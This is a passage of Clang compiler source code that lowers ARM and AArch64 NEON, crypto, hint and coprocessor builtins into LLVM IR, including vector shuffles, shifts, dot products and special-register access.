case NEON::BI__builtin_neon_vpadalq_v: {
// The source operand type has twice as many elements of half the size.
unsigned EltBits = VTy->getElementType()->getPrimitiveSizeInBits();
llvm::Type *EltTy =
llvm::IntegerType::get(getLLVMContext(), EltBits / 2);
auto *NarrowTy =
llvm::FixedVectorType::get(EltTy, VTy->getNumElements() * 2);
llvm::Type *Tys[2] = { Ty, NarrowTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vpaddl_v:
case NEON::BI__builtin_neon_vpaddlq_v: {
// The source operand type has twice as many elements of half the size.
unsigned EltBits = VTy->getElementType()->getPrimitiveSizeInBits();
llvm::Type *EltTy = llvm::IntegerType::get(getLLVMContext(), EltBits / 2);
auto *NarrowTy =
llvm::FixedVectorType::get(EltTy, VTy->getNumElements() * 2);
llvm::Type *Tys[2] = { Ty, NarrowTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vpaddl");
}
case NEON::BI__builtin_neon_vqdmlal_v:
case NEON::BI__builtin_neon_vqdmlsl_v: {
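// vqdmlal/vqdmlsl is a two-step lowering: first the saturating doubling
// multiply (LLVMIntrinsic, e.g. sqdmull), then the saturating add/subtract
// accumulate (AltLLVMIntrinsic).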
SmallVector<Value *, 2> MulOps(Ops.begin() + 1, Ops.end());
Ops[1] =
EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Ty), MulOps, "vqdmlal");
Ops.resize(2);
return EmitNeonCall(CGM.getIntrinsic(AltLLVMIntrinsic, Ty), Ops, NameHint);
}
case NEON::BI__builtin_neon_vqdmulhq_lane_v:
case NEON::BI__builtin_neon_vqdmulh_lane_v:
case NEON::BI__builtin_neon_vqrdmulhq_lane_v:
case NEON::BI__builtin_neon_vqrdmulh_lane_v: {
auto *RTy = cast<llvm::FixedVectorType>(Ty);
if (BuiltinID == NEON::BI__builtin_neon_vqdmulhq_lane_v ||
BuiltinID == NEON::BI__builtin_neon_vqrdmulhq_lane_v)
RTy = llvm::FixedVectorType::get(RTy->getElementType(),
RTy->getNumElements() * 2);
llvm::Type *Tys[2] = {
RTy, GetNeonType(this, NeonTypeFlags(Type.getEltType(), false,
/*isQuad*/ false))};
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vqdmulhq_laneq_v:
case NEON::BI__builtin_neon_vqdmulh_laneq_v:
case NEON::BI__builtin_neon_vqrdmulhq_laneq_v:
case NEON::BI__builtin_neon_vqrdmulh_laneq_v: {
llvm::Type *Tys[2] = {
Ty, GetNeonType(this, NeonTypeFlags(Type.getEltType(), false,
/*isQuad*/ true))};
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vqshl_n_v:
case NEON::BI__builtin_neon_vqshlq_n_v:
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshl_n",
1, false);
case NEON::BI__builtin_neon_vqshlu_n_v:
case NEON::BI__builtin_neon_vqshluq_n_v:
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshlu_n",
1, false);
case NEON::BI__builtin_neon_vrecpe_v:
case NEON::BI__builtin_neon_vrecpeq_v:
case NEON::BI__builtin_neon_vrsqrte_v:
case NEON::BI__builtin_neon_vrsqrteq_v:
Int = Ty->isFPOrFPVectorTy() ? LLVMIntrinsic : AltLLVMIntrinsic;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, NameHint);
case NEON::BI__builtin_neon_vrndi_v:
case NEON::BI__builtin_neon_vrndiq_v:
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_nearbyint
: Intrinsic::nearbyint;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, NameHint);
case NEON::BI__builtin_neon_vrshr_n_v:
case NEON::BI__builtin_neon_vrshrq_n_v:
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrshr_n",
1, true);
case NEON::BI__builtin_neon_vsha512hq_v:
case NEON::BI__builtin_neon_vsha512h2q_v:
case NEON::BI__builtin_neon_vsha512su0q_v:
case NEON::BI__builtin_neon_vsha512su1q_v: {
Function *F = CGM.getIntrinsic(Int);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vshl_n_v:
case NEON::BI__builtin_neon_vshlq_n_v:
Ops[1] = EmitNeonShiftVector(Ops[1], Ty, false);
return Builder.CreateShl(Builder.CreateBitCast(Ops[0], Ty), Ops[1],
"vshl_n");
case NEON::BI__builtin_neon_vshll_n_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getTruncatedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
if (Usgn)
Ops[0] = Builder.CreateZExt(Ops[0], VTy);
else
Ops[0] = Builder.CreateSExt(Ops[0], VTy);
Ops[1] = EmitNeonShiftVector(Ops[1], VTy, false);
return Builder.CreateShl(Ops[0], Ops[1], "vshll_n");
}
case NEON::BI__builtin_neon_vshrn_n_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
Ops[1] = EmitNeonShiftVector(Ops[1], SrcTy, false);
if (Usgn)
Ops[0] = Builder.CreateLShr(Ops[0], Ops[1]);
else
Ops[0] = Builder.CreateAShr(Ops[0], Ops[1]);
return Builder.CreateTrunc(Ops[0], Ty, "vshrn_n");
}
case NEON::BI__builtin_neon_vshr_n_v:
case NEON::BI__builtin_neon_vshrq_n_v:
return EmitNeonRShiftImm(Ops[0], Ops[1], Ty, Usgn, "vshr_n");
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
case NEON::BI__builtin_neon_vst2_v:
case NEON::BI__builtin_neon_vst2q_v:
case NEON::BI__builtin_neon_vst3_v:
case NEON::BI__builtin_neon_vst3q_v:
case NEON::BI__builtin_neon_vst4_v:
case NEON::BI__builtin_neon_vst4q_v:
case NEON::BI__builtin_neon_vst2_lane_v:
case NEON::BI__builtin_neon_vst2q_lane_v:
case NEON::BI__builtin_neon_vst3_lane_v:
case NEON::BI__builtin_neon_vst3q_lane_v:
case NEON::BI__builtin_neon_vst4_lane_v:
case NEON::BI__builtin_neon_vst4q_lane_v: {
llvm::Type *Tys[] = {Int8PtrTy, Ty};
Ops.push_back(getAlignmentValue32(PtrOp0));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "");
}
case NEON::BI__builtin_neon_vsm3partw1q_v:
case NEON::BI__builtin_neon_vsm3partw2q_v:
case NEON::BI__builtin_neon_vsm3ss1q_v:
case NEON::BI__builtin_neon_vsm4ekeyq_v:
case NEON::BI__builtin_neon_vsm4eq_v: {
Function *F = CGM.getIntrinsic(Int);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vsm3tt1aq_v:
case NEON::BI__builtin_neon_vsm3tt1bq_v:
case NEON::BI__builtin_neon_vsm3tt2aq_v:
case NEON::BI__builtin_neon_vsm3tt2bq_v: {
Function *F = CGM.getIntrinsic(Int);
Ops[3] = Builder.CreateZExt(Ops[3], Int64Ty);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vst1_x2_v:
case NEON::BI__builtin_neon_vst1q_x2_v:
case NEON::BI__builtin_neon_vst1_x3_v:
case NEON::BI__builtin_neon_vst1q_x3_v:
case NEON::BI__builtin_neon_vst1_x4_v:
case NEON::BI__builtin_neon_vst1q_x4_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy->getElementType());
// TODO: Currently in AArch32 mode the pointer operand comes first, whereas
// in AArch64 it comes last. We may want to standardize on one or the other.
if (Arch == llvm::Triple::aarch64 || Arch == llvm::Triple::aarch64_be ||
Arch == llvm::Triple::aarch64_32) {
llvm::Type *Tys[2] = { VTy, PTy };
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, "");
}
llvm::Type *Tys[2] = { PTy, VTy };
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, "");
}
case NEON::BI__builtin_neon_vsubhn_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
// %diff = sub <4 x i32> %lhs, %rhs
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
Ops[1] = Builder.CreateBitCast(Ops[1], SrcTy);
Ops[0] = Builder.CreateSub(Ops[0], Ops[1], "vsubhn");
// %high = lshr <4 x i32> %diff, <i32 16, i32 16, i32 16, i32 16>
Constant *ShiftAmt =
ConstantInt::get(SrcTy, SrcTy->getScalarSizeInBits() / 2);
Ops[0] = Builder.CreateLShr(Ops[0], ShiftAmt, "vsubhn");
// %res = trunc <4 x i32> %high to <4 x i16>
return Builder.CreateTrunc(Ops[0], VTy, "vsubhn");
}
case NEON::BI__builtin_neon_vtrn_v:
case NEON::BI__builtin_neon_vtrnq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
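// For a 4-element vector, the two stores receive shuffles with lane indices
// {0,4,2,6} and {1,5,3,7} of the concatenated inputs, i.e. a 2x2 transpose.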
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back(i+vi);
Indices.push_back(i+e+vi);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vtrn");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vtst_v:
case NEON::BI__builtin_neon_vtstq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[0] = Builder.CreateAnd(Ops[0], Ops[1]);
Ops[0] = Builder.CreateICmp(ICmpInst::ICMP_NE, Ops[0],
ConstantAggregateZero::get(Ty));
return Builder.CreateSExt(Ops[0], Ty, "vtst");
}
case NEON::BI__builtin_neon_vuzp_v:
case NEON::BI__builtin_neon_vuzpq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
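// For a 4-element vector, the two stores receive the even lanes {0,2,4,6}
// and the odd lanes {1,3,5,7} of the concatenated inputs.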
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; ++i)
Indices.push_back(2*i+vi);
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vuzp");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vxarq_v: {
Function *F = CGM.getIntrinsic(Int);
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vzip_v:
case NEON::BI__builtin_neon_vzipq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
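// For a 4-element vector, the two stores receive the interleavings
// {0,4,1,5} and {2,6,3,7} of the concatenated inputs.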
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back((i + vi*e) >> 1);
Indices.push_back(((i + vi*e) >> 1)+e);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vzip");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vdot_v:
case NEON::BI__builtin_neon_vdotq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
Int = Usgn ? LLVMIntrinsic : AltLLVMIntrinsic;
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vdot");
}
case NEON::BI__builtin_neon_vfmlal_low_v:
case NEON::BI__builtin_neon_vfmlalq_low_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlal_low");
}
case NEON::BI__builtin_neon_vfmlsl_low_v:
case NEON::BI__builtin_neon_vfmlslq_low_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlsl_low");
}
case NEON::BI__builtin_neon_vfmlal_high_v:
case NEON::BI__builtin_neon_vfmlalq_high_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlal_high");
}
case NEON::BI__builtin_neon_vfmlsl_high_v:
case NEON::BI__builtin_neon_vfmlslq_high_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlsl_high");
}
case NEON::BI__builtin_neon_vmmlaq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
Int = Usgn ? LLVMIntrinsic : AltLLVMIntrinsic;
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmmla");
}
case NEON::BI__builtin_neon_vusmmlaq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vusmmla");
}
case NEON::BI__builtin_neon_vusdot_v:
case NEON::BI__builtin_neon_vusdotq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vusdot");
}
case NEON::BI__builtin_neon_vbfdot_v:
case NEON::BI__builtin_neon_vbfdotq_v: {
llvm::Type *InputTy =
llvm::FixedVectorType::get(BFloatTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vbfdot");
}
case NEON::BI__builtin_neon___a32_vcvt_bf16_v: {
llvm::Type *Tys[1] = { Ty };
Function *F = CGM.getIntrinsic(Int, Tys);
return EmitNeonCall(F, Ops, "vcvtfp2bf");
}
}
assert(Int && "Expected valid intrinsic number");
// Determine the type(s) of this overloaded Neon intrinsic.
Function *F = LookupNeonLLVMIntrinsic(Int, Modifier, Ty, E);
Value *Result = EmitNeonCall(F, Ops, NameHint);
llvm::Type *ResultType = ConvertType(E->getType());
// For AArch64 intrinsics that produce a one-element vector, cast the result
// back to the scalar type the builtin expects.
return Builder.CreateBitCast(Result, ResultType, NameHint);
}
Value *CodeGenFunction::EmitAArch64CompareBuiltinExpr(
Value *Op, llvm::Type *Ty, const CmpInst::Predicate Fp,
const CmpInst::Predicate Ip, const Twine &Name) {
llvm::Type *OTy = Op->getType();
// FIXME: this is utterly horrific. We should not be looking at previous
// codegen context to find out what needs doing. Unfortunately TableGen
// currently gives us exactly the same calls for vceqz_f32 and vceqz_s32
// (etc).
if (BitCastInst *BI = dyn_cast<BitCastInst>(Op))
OTy = BI->getOperand(0)->getType();
Op = Builder.CreateBitCast(Op, OTy);
if (OTy->getScalarType()->isFloatingPointTy()) {
Op = Builder.CreateFCmp(Fp, Op, Constant::getNullValue(OTy));
} else {
Op = Builder.CreateICmp(Ip, Op, Constant::getNullValue(OTy));
}
return Builder.CreateSExt(Op, Ty, Name);
}
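// For example, vceqz_f32 on a <2 x float> operand emits (an IR sketch):
//   %cmp = fcmp oeq <2 x float> %a, zeroinitializer
//   %res = sext <2 x i1> %cmp to <2 x i32>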
static Value *packTBLDVectorList(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
Value *ExtOp, Value *IndexOp,
llvm::Type *ResTy, unsigned IntID,
const char *Name) {
SmallVector<Value *, 2> TblOps;
if (ExtOp)
TblOps.push_back(ExtOp);
// Build a vector containing sequential numbers, e.g. (0, 1, 2, ..., 15).
SmallVector<int, 16> Indices;
auto *TblTy = cast<llvm::FixedVectorType>(Ops[0]->getType());
for (unsigned i = 0, e = TblTy->getNumElements(); i != e; ++i) {
Indices.push_back(2*i);
Indices.push_back(2*i+1);
}
int PairPos = 0, End = Ops.size() - 1;
while (PairPos < End) {
TblOps.push_back(CGF.Builder.CreateShuffleVector(Ops[PairPos],
Ops[PairPos+1], Indices,
Name));
PairPos += 2;
}
// If there's an odd number of 64-bit lookup tables, fill the high 64 bits
// of the final 128-bit lookup table with zero.
if (PairPos == End) {
Value *ZeroTbl = ConstantAggregateZero::get(TblTy);
TblOps.push_back(CGF.Builder.CreateShuffleVector(Ops[PairPos],
ZeroTbl, Indices, Name));
}
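// E.g. for vtbl3 the three 64-bit tables {t0, t1, t2} are packed into two
// 128-bit tables: concat(t0, t1) and concat(t2, zero).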
Function *TblF;
TblOps.push_back(IndexOp);
TblF = CGF.CGM.getIntrinsic(IntID, ResTy);
return CGF.EmitNeonCall(TblF, TblOps, Name);
}
Value *CodeGenFunction::GetValueForARMHint(unsigned BuiltinID) {
unsigned Value;
switch (BuiltinID) {
default:
return nullptr;
case ARM::BI__builtin_arm_nop:
Value = 0;
break;
case ARM::BI__builtin_arm_yield:
case ARM::BI__yield:
Value = 1;
break;
case ARM::BI__builtin_arm_wfe:
case ARM::BI__wfe:
Value = 2;
break;
case ARM::BI__builtin_arm_wfi:
case ARM::BI__wfi:
Value = 3;
break;
case ARM::BI__builtin_arm_sev:
case ARM::BI__sev:
Value = 4;
break;
case ARM::BI__builtin_arm_sevl:
case ARM::BI__sevl:
Value = 5;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_hint),
llvm::ConstantInt::get(Int32Ty, Value));
}
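// For example, __builtin_arm_wfi() lowers to "call void @llvm.arm.hint(i32 3)".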
enum SpecialRegisterAccessKind {
NormalRead,
VolatileRead,
Write,
};
// Generates the IR for the read/write special register builtin.
// ValueType is the type of the value that is to be written or read;
// RegisterType is the type of the register being written to or read from.
static Value *EmitSpecialRegisterBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
llvm::Type *RegisterType,
llvm::Type *ValueType,
SpecialRegisterAccessKind AccessKind,
StringRef SysReg = "") {
// The read and write register intrinsics only support 32- and 64-bit
// operations.
assert((RegisterType->isIntegerTy(32) || RegisterType->isIntegerTy(64))
&& "Unsupported size for register.");
CodeGen::CGBuilderTy &Builder = CGF.Builder;
CodeGen::CodeGenModule &CGM = CGF.CGM;
LLVMContext &Context = CGM.getLLVMContext();
if (SysReg.empty()) {
const Expr *SysRegStrExpr = E->getArg(0)->IgnoreParenCasts();
SysReg = cast<clang::StringLiteral>(SysRegStrExpr)->getString();
}
llvm::Metadata *Ops[] = { llvm::MDString::get(Context, SysReg) };
llvm::MDNode *RegName = llvm::MDNode::get(Context, Ops);
llvm::Value *Metadata = llvm::MetadataAsValue::get(Context, RegName);
llvm::Type *Types[] = { RegisterType };
bool MixedTypes = RegisterType->isIntegerTy(64) && ValueType->isIntegerTy(32);
assert(!(RegisterType->isIntegerTy(32) && ValueType->isIntegerTy(64))
&& "Can't fit 64-bit value in 32-bit register");
if (AccessKind != Write) {
assert(AccessKind == NormalRead || AccessKind == VolatileRead);
llvm::Function *F = CGM.getIntrinsic(
AccessKind == VolatileRead ? llvm::Intrinsic::read_volatile_register
: llvm::Intrinsic::read_register,
Types);
llvm::Value *Call = Builder.CreateCall(F, Metadata);
if (MixedTypes)
// Read into 64 bit register and then truncate result to 32 bit.
return Builder.CreateTrunc(Call, ValueType);
if (ValueType->isPointerTy())
// Have i32/i64 result (Call) but want to return a VoidPtrTy (i8*).
return Builder.CreateIntToPtr(Call, ValueType);
return Call;
}
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::write_register, Types);
llvm::Value *ArgValue = CGF.EmitScalarExpr(E->getArg(1));
if (MixedTypes) {
// Extend 32 bit write value to 64 bit to pass to write.
ArgValue = Builder.CreateZExt(ArgValue, RegisterType);
return Builder.CreateCall(F, { Metadata, ArgValue });
}
if (ValueType->isPointerTy()) {
// Have VoidPtrTy ArgValue but want to return an i32/i64.
ArgValue = Builder.CreatePtrToInt(ArgValue, RegisterType);
return Builder.CreateCall(F, { Metadata, ArgValue });
}
return Builder.CreateCall(F, { Metadata, ArgValue });
}
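// A sketch of the mixed-type read path handled above: reading a 32-bit value
// from a 64-bit register emits
//   %reg = call i64 @llvm.read_register.i64(metadata !0)
//   %val = trunc i64 %reg to i32
// where !0 names the system register.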
/// Return true if BuiltinID is an overloaded Neon intrinsic with an extra
/// argument that specifies the vector type.
static bool HasExtraNeonArgument(unsigned BuiltinID) {
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_vget_lane_i8:
case NEON::BI__builtin_neon_vget_lane_i16:
case NEON::BI__builtin_neon_vget_lane_bf16:
case NEON::BI__builtin_neon_vget_lane_i32:
case NEON::BI__builtin_neon_vget_lane_i64:
case NEON::BI__builtin_neon_vget_lane_f32:
case NEON::BI__builtin_neon_vgetq_lane_i8:
case NEON::BI__builtin_neon_vgetq_lane_i16:
case NEON::BI__builtin_neon_vgetq_lane_bf16:
case NEON::BI__builtin_neon_vgetq_lane_i32:
case NEON::BI__builtin_neon_vgetq_lane_i64:
case NEON::BI__builtin_neon_vgetq_lane_f32:
case NEON::BI__builtin_neon_vduph_lane_bf16:
case NEON::BI__builtin_neon_vduph_laneq_bf16:
case NEON::BI__builtin_neon_vset_lane_i8:
case NEON::BI__builtin_neon_vset_lane_i16:
case NEON::BI__builtin_neon_vset_lane_bf16:
case NEON::BI__builtin_neon_vset_lane_i32:
case NEON::BI__builtin_neon_vset_lane_i64:
case NEON::BI__builtin_neon_vset_lane_f32:
case NEON::BI__builtin_neon_vsetq_lane_i8:
case NEON::BI__builtin_neon_vsetq_lane_i16:
case NEON::BI__builtin_neon_vsetq_lane_bf16:
case NEON::BI__builtin_neon_vsetq_lane_i32:
case NEON::BI__builtin_neon_vsetq_lane_i64:
case NEON::BI__builtin_neon_vsetq_lane_f32:
case NEON::BI__builtin_neon_vsha1h_u32:
case NEON::BI__builtin_neon_vsha1cq_u32:
case NEON::BI__builtin_neon_vsha1pq_u32:
case NEON::BI__builtin_neon_vsha1mq_u32:
case NEON::BI__builtin_neon_vcvth_bf16_f32:
case clang::ARM::BI_MoveToCoprocessor:
case clang::ARM::BI_MoveToCoprocessor2:
return false;
}
return true;
}
Value *CodeGenFunction::EmitARMBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
if (auto Hint = GetValueForARMHint(BuiltinID))
return Hint;
if (BuiltinID == ARM::BI__emit) {
bool IsThumb = getTarget().getTriple().getArch() == llvm::Triple::thumb;
llvm::FunctionType *FTy =
llvm::FunctionType::get(VoidTy, /*Variadic=*/false);
Expr::EvalResult Result;
if (!E->getArg(0)->EvaluateAsInt(Result, CGM.getContext()))
llvm_unreachable("Sema will ensure that the parameter is constant");
llvm::APSInt Value = Result.Val.getInt();
uint64_t ZExtValue = Value.zextOrTrunc(IsThumb ? 16 : 32).getZExtValue();
llvm::InlineAsm *Emit =
IsThumb ? InlineAsm::get(FTy, ".inst.n 0x" + utohexstr(ZExtValue), "",
/*hasSideEffects=*/true)
: InlineAsm::get(FTy, ".inst 0x" + utohexstr(ZExtValue), "",
/*hasSideEffects=*/true);
return Builder.CreateCall(Emit);
}
if (BuiltinID == ARM::BI__builtin_arm_dbg) {
Value *Option = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_dbg), Option);
}
if (BuiltinID == ARM::BI__builtin_arm_prefetch) {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *RW = EmitScalarExpr(E->getArg(1));
Value *IsData = EmitScalarExpr(E->getArg(2));
// Locality is not supported on the ARM target.
Value *Locality = llvm::ConstantInt::get(Int32Ty, 3);
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return Builder.CreateCall(F, {Address, RW, Locality, IsData});
}
if (BuiltinID == ARM::BI__builtin_arm_rbit) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::bitreverse, Arg->getType()), Arg, "rbit");
}
if (BuiltinID == ARM::BI__builtin_arm_cls) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_cls), Arg, "cls");
}
if (BuiltinID == ARM::BI__builtin_arm_cls64) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_cls64), Arg,
"cls");
}
if (BuiltinID == ARM::BI__clear_cache) {
assert(E->getNumArgs() == 2 && "__clear_cache takes 2 arguments");
const FunctionDecl *FD = E->getDirectCallee();
Value *Ops[2];
for (unsigned i = 0; i < 2; i++)
Ops[i] = EmitScalarExpr(E->getArg(i));
llvm::Type *Ty = CGM.getTypes().ConvertType(FD->getType());
llvm::FunctionType *FTy = cast<llvm::FunctionType>(Ty);
StringRef Name = FD->getName();
return EmitNounwindRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name), Ops);
}
if (BuiltinID == ARM::BI__builtin_arm_mcrr ||
BuiltinID == ARM::BI__builtin_arm_mcrr2) {
Function *F;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin");
case ARM::BI__builtin_arm_mcrr:
F = CGM.getIntrinsic(Intrinsic::arm_mcrr);
break;
case ARM::BI__builtin_arm_mcrr2:
F = CGM.getIntrinsic(Intrinsic::arm_mcrr2);
break;
}
// The MCRR{2} instruction has 5 operands but the intrinsic has only 4:
// Rt and Rt2 are represented as a single unsigned 64-bit integer in the
// intrinsic definition, even though the instruction encodes them as two
// 32-bit registers.
Value *Coproc = EmitScalarExpr(E->getArg(0));
Value *Opc1 = EmitScalarExpr(E->getArg(1));
Value *RtAndRt2 = EmitScalarExpr(E->getArg(2));
Value *CRm = EmitScalarExpr(E->getArg(3));
Value *C1 = llvm::ConstantInt::get(Int64Ty, 32);
Value *Rt = Builder.CreateTruncOrBitCast(RtAndRt2, Int32Ty);
Value *Rt2 = Builder.CreateLShr(RtAndRt2, C1);
Rt2 = Builder.CreateTruncOrBitCast(Rt2, Int32Ty);
return Builder.CreateCall(F, {Coproc, Opc1, Rt, Rt2, CRm});
}
if (BuiltinID == ARM::BI__builtin_arm_mrrc ||
BuiltinID == ARM::BI__builtin_arm_mrrc2) {
Function *F;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin");
case ARM::BI__builtin_arm_mrrc:
F = CGM.getIntrinsic(Intrinsic::arm_mrrc);
break;
case ARM::BI__builtin_arm_mrrc2:
F = CGM.getIntrinsic(Intrinsic::arm_mrrc2);
break;
}
Value *Coproc = EmitScalarExpr(E->getArg(0));
Value *Opc1 = EmitScalarExpr(E->getArg(1));
Value *CRm = EmitScalarExpr(E->getArg(2));
Value *RtAndRt2 = Builder.CreateCall(F, {Coproc, Opc1, CRm});
// The call returns an unsigned 64-bit integer, represented as two 32-bit
// halves.
Value *Rt = Builder.CreateExtractValue(RtAndRt2, 1);
Value *Rt1 = Builder.CreateExtractValue(RtAndRt2, 0);
Rt = Builder.CreateZExt(Rt, Int64Ty);
Rt1 = Builder.CreateZExt(Rt1, Int64Ty);
Value *ShiftCast = llvm::ConstantInt::get(Int64Ty, 32);
RtAndRt2 = Builder.CreateShl(Rt, ShiftCast, "shl", true);
RtAndRt2 = Builder.CreateOr(RtAndRt2, Rt1);
return Builder.CreateBitCast(RtAndRt2, ConvertType(E->getType()));
}
if (BuiltinID == ARM::BI__builtin_arm_ldrexd ||
((BuiltinID == ARM::BI__builtin_arm_ldrex ||
BuiltinID == ARM::BI__builtin_arm_ldaex) &&
getContext().getTypeSize(E->getType()) == 64) ||
BuiltinID == ARM::BI__ldrexd) {
Function *F;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin");
case ARM::BI__builtin_arm_ldaex:
F = CGM.getIntrinsic(Intrinsic::arm_ldaexd);
break;
case ARM::BI__builtin_arm_ldrexd:
case ARM::BI__builtin_arm_ldrex:
case ARM::BI__ldrexd:
F = CGM.getIntrinsic(Intrinsic::arm_ldrexd);
break;
}
Value *LdPtr = EmitScalarExpr(E->getArg(0));
